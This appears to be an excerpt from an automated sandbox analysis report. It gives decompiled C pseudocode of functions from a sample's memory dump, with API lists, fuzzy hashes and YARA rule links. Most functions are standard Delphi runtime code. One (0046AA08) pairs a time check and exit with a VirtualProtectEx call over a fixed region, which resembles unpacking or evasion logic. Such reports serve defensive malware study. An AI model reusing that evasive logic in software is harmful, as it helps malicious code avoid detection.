                                                                                0x004533a1
                                                                                0x004533a4
                                                                                0x004533ad

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CursorLoad
                                                                                • String ID:
                                                                                • API String ID: 3238433803-0
                                                                                • Opcode ID: 970608c962dfe9579670997007ca9dfd727f28781e592547f57f766a683e145f
                                                                                • Instruction ID: b1caf607b14ff593e9217e7f127a1446ae7340b5e4665508d0a3cfd9e6c96b03
                                                                                • Opcode Fuzzy Hash: 970608c962dfe9579670997007ca9dfd727f28781e592547f57f766a683e145f
                                                                                • Instruction Fuzzy Hash: A0F0822170020457D620197E5CC0D2EB684DB817B7B21037BFD3ACB2E2CF29AE4642A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401590, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401590(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401444(0x4875e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                0x00401593
                                                                                0x0040159d
                                                                                0x004015ac
                                                                                0x0040159f
                                                                                0x0040159f
                                                                                0x0040159f
                                                                                0x004015b2
                                                                                0x004015bf
                                                                                0x004015c4
                                                                                0x004015c6
                                                                                0x004015ca
                                                                                0x004015d3
                                                                                0x004015da
                                                                                0x004015e6
                                                                                0x004015ed
                                                                                0x00000000
                                                                                0x004015ed
                                                                                0x004015da
                                                                                0x004015f2

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015BF
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 07daf6b8937cae355694799808fb6db99fa22e5180326d9c3c24eb0050f15955
                                                                                • Instruction ID: 7ee7b2b378d9b21af57a504837b06affff0a11b55aa281933ae50cd2cee7ebd5
                                                                                • Opcode Fuzzy Hash: 07daf6b8937cae355694799808fb6db99fa22e5180326d9c3c24eb0050f15955
                                                                                • Instruction Fuzzy Hash: F4F02772F002202BEB20696A4CC1F4366C59FC5790F180177FA08FF3E9D6798C0043A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046AA08, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0046AA08(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E0046A9D0( *((intOrPtr*)( *_t31))) == 0) {
					if(E0046A9FC( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x46a9bc;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa0) ^ 0x00019b81) != 0x5ecca) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa4), 0x1465f, 4,  &_v8); // executed
				E0046AAF8(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa4)), 0x1465f, __edi, __esi, 0x1acd9, 0x46bd08);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x40a3;
				return _t29 | 0xffffffff;
			}









                                                                                0x0046aa0d
                                                                                0x0046aa1b
                                                                                0x0046aa8d
                                                                                0x00000000
                                                                                0x0046aaa2
                                                                                0x0046aa97
                                                                                0x00000000
                                                                                0x0046aa9d
                                                                                0x0046aa1d
                                                                                0x0046aa32
                                                                                0x00000000
                                                                                0x0046aa7e
                                                                                0x0046aa48
                                                                                0x0046aa67
                                                                                0x0046aa6c
                                                                                0x0046aa6f
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0046A9D0: GetSystemTime.KERNEL32 ref: 0046A9D7
                                                                                  • Part of subcall function 0046A9D0: ExitProcess.KERNEL32(00000000), ref: 0046A9E6
                                                                                • VirtualProtectEx.KERNEL32(000000FF,?,0001465F,00000004,?), ref: 0046AA48
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ExitProcessProtectSystemTimeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1291046601-0
                                                                                • Opcode ID: 5b2a46624185d581ea21671ad217231ed216d584df6c4e5170e27ce6a791d0df
                                                                                • Instruction ID: 933bd6c47300b109d5fd9173ba739c1b5b1a8afb3f7ecdb2f71907d76ff0079e
                                                                                • Opcode Fuzzy Hash: 5b2a46624185d581ea21671ad217231ed216d584df6c4e5170e27ce6a791d0df
                                                                                • Instruction Fuzzy Hash: 501152742046009FC700DF95C681E6273D5AF4A324F2482A7B628AF396E678EC55CB5B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407286, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407286(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                                0x004072b1
                                                                                0x004072b8

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
                                                                                • Instruction ID: 764575f9a061b279fabeaa25adf60532a7347093fa5cbb10b55d8dde51a955d6
                                                                                • Opcode Fuzzy Hash: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
                                                                                • Instruction Fuzzy Hash: 7BE0FEB2204209BFEB00DE8ADDC1DABB7ACFB4C654F814115BB1C97242D275AC608B75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407288, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407288(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                                0x004072b1
                                                                                0x004072b8

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
                                                                                • Instruction ID: 3cd20fb1d280f358d9783e880d6765cd3a24c9f6542a4f025d110428a1baabb2
                                                                                • Opcode Fuzzy Hash: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
                                                                                • Instruction Fuzzy Hash: 13E002B2204309BFEB00DE8ADDC1DABB7ACFB4C654F814105BB1C97242C275AC608B75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405A3C, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405A3C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405C78(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                                                                0x00405a44
                                                                                0x00405a4a
                                                                                0x00405a56
                                                                                0x00405a5a
                                                                                0x00405a63
                                                                                0x00405a68
                                                                                0x00405a6a
                                                                                0x00405a6f
                                                                                0x00405a71
                                                                                0x00405a74
                                                                                0x00405a74
                                                                                0x00405a6f
                                                                                0x00405a77
                                                                                0x00405a82

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?,00000400,?,004103FC,00413F53,00000000,00413F78), ref: 00405A5A
                                                                                  • Part of subcall function 00405C78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                  • Part of subcall function 00405C78: RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                • String ID:
                                                                                • API String ID: 2796650324-0
                                                                                • Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                                • Instruction ID: eb3007f67f035d8ae6987e39c34b1bfc81debd44418eda91f1e8b5ec37918a95
                                                                                • Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                                • Instruction Fuzzy Hash: 7AE03971A006188BCB10DE6888C1A973398AB08754F4006A6AD54EF386D374D9108F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401724, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401724(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4875e4; // 0x70c354
				while(_t29 != 0x4875e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                0x0040172b
                                                                                0x0040172f
                                                                                0x00401736
                                                                                0x0040174b
                                                                                0x00401753
                                                                                0x00401759
                                                                                0x0040175f
                                                                                0x00401762
                                                                                0x004017a6
                                                                                0x0040176a
                                                                                0x00401770
                                                                                0x00401774
                                                                                0x00401776
                                                                                0x00401776
                                                                                0x0040177c
                                                                                0x0040177e
                                                                                0x0040177e
                                                                                0x00401784
                                                                                0x00401791
                                                                                0x00401798
                                                                                0x0040179a
                                                                                0x004017a0
                                                                                0x00000000
                                                                                0x004017a0
                                                                                0x00401798
                                                                                0x004017a4
                                                                                0x004017a4
                                                                                0x004017b5

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401791
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: dd8d32f79d6d1f06e15ecb6ac7b9d7952d5c6991f51ac8b21c726be03388b82c
                                                                                • Instruction ID: 1a5925291fe787c1d48d88209c3eaa4d58d595cd838ba54473f015ce8f777fb7
                                                                                • Opcode Fuzzy Hash: dd8d32f79d6d1f06e15ecb6ac7b9d7952d5c6991f51ac8b21c726be03388b82c
                                                                                • Instruction Fuzzy Hash: 57117C7AA046019FC3109F29C980A1BB7E5EFC4760F15C63EE598A73A5D639AC408B89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041C940, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0041C940(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x487a20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x487a1c; // 0x2390000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402994(0x46b4bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041C938(_t2, E0041C918);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041C938(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x487a20;
						 *0x487a20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x487a1c = _t35;
				}
				_t25 =  *0x487a20;
				 *0x487a20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x487a20;
			}








                                                                                0x0041c94e
                                                                                0x0041c95e
                                                                                0x0041c963
                                                                                0x0041c965
                                                                                0x0041c96a
                                                                                0x0041c96c
                                                                                0x0041c979
                                                                                0x0041c983
                                                                                0x0041c98b
                                                                                0x0041c98e
                                                                                0x0041c98e
                                                                                0x0041c991
                                                                                0x0041c991
                                                                                0x0041c994
                                                                                0x0041c99e
                                                                                0x0041c9a3
                                                                                0x0041c9a6
                                                                                0x0041c9a8
                                                                                0x0041c9af
                                                                                0x0041c9b6
                                                                                0x0041c9b6
                                                                                0x0041c9be
                                                                                0x0041c9c3
                                                                                0x0041c9c8
                                                                                0x0041c9ce
                                                                                0x0041c9d5

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction ID: 28b28392519e15f92a9e572b18f021e7989893867b799864ec383581726918ff
                                                                                • Opcode Fuzzy Hash: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction Fuzzy Hash: B21136B42443059BD710DF19CCC1B86B7E4EB48390F20C93AE9999B786D378E9418BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 004405C4, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E004405C4() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x486dd0; // 0x4877f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x44072a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x487bb8 == 0) {
						 *0x487bb8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x46b9fc == 0) {
						 *0x46b9fc = LoadLibraryA("IMM32.DLL");
						if( *0x46b9fc != 0) {
							_t11 =  *0x46b9fc; // 0x0
							 *0x487bbc = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x46b9fc; // 0x0
							 *0x487bc0 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x46b9fc; // 0x0
							 *0x487bc4 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x46b9fc; // 0x0
							 *0x487bc8 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x46b9fc; // 0x0
							 *0x487bcc = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x46b9fc; // 0x0
							 *0x487bd0 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x46b9fc; // 0x0
							 *0x487bd4 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x46b9fc; // 0x0
							 *0x487bd8 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x46b9fc; // 0x0
							 *0x487bdc = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x46b9fc; // 0x0
							 *0x487be0 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x440731);
					return SetErrorMode(_v8);
				}
			}


















                                                                                0x004405c5
                                                                                0x004405c9
                                                                                0x004405d2
                                                                                0x00440734
                                                                                0x004405d8
                                                                                0x004405e2
                                                                                0x004405e7
                                                                                0x004405e8
                                                                                0x004405ed
                                                                                0x004405f0
                                                                                0x004405fa
                                                                                0x00440613
                                                                                0x00440613
                                                                                0x0044061f
                                                                                0x0044062f
                                                                                0x0044063b
                                                                                0x00440646
                                                                                0x00440651
                                                                                0x0044065b
                                                                                0x00440666
                                                                                0x00440670
                                                                                0x0044067b
                                                                                0x00440685
                                                                                0x00440690
                                                                                0x0044069a
                                                                                0x004406a5
                                                                                0x004406af
                                                                                0x004406ba
                                                                                0x004406c4
                                                                                0x004406cf
                                                                                0x004406d9
                                                                                0x004406e4
                                                                                0x004406ee
                                                                                0x004406f9
                                                                                0x00440703
                                                                                0x0044070e
                                                                                0x0044070e
                                                                                0x0044063b
                                                                                0x00440715
                                                                                0x00440718
                                                                                0x0044071b
                                                                                0x00440729
                                                                                0x00440729

                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                • SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                                • API String ID: 3397921170-3271328588
                                                                                • Opcode ID: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
                                                                                • Instruction ID: 0cf64c75a47a1564bac7c0c751d74d83d05284642008fa8f65c16265756f8fe4
                                                                                • Opcode Fuzzy Hash: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
